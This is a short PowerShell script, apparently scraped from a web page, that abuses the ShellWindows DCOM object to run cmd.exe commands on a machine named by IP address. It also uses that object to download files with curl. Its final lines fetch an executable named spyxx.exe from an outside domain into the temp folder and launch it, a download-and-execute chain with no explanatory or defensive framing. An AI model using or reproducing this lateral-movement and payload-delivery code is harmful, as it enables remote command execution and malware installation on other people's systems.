function ExecDCOM($ip = "127.0.0.1", $cmd = "notepad.exe")
{
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);
$obj = [System.Activator]::CreateInstance($com);
$item = $obj.item();
$ret = $item.Document.Application.ShellExecute("cmd.exe","/c " + $cmd,"c:\windows\system32",$null,0);
return $ret;
}
function DownloadDCOM($ip = "127.0.0.1", $url = "notepad.exe", $dir = $env:temp)
{
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);
$obj = [System.Activator]::CreateInstance($com);
$item = $obj.item();
$ret = $item.Document.Application.ShellExecute("curl","-O " + $url, $dir, $null, 0);
return $ret;
}
DownloadDCOM "127.0.0.1" "http://sqlxss.com/spyxx.exe"
ExecDCOM "127.0.0.1" ($env:temp + "/spyxx.exe")
浙公网安备 33010602011771号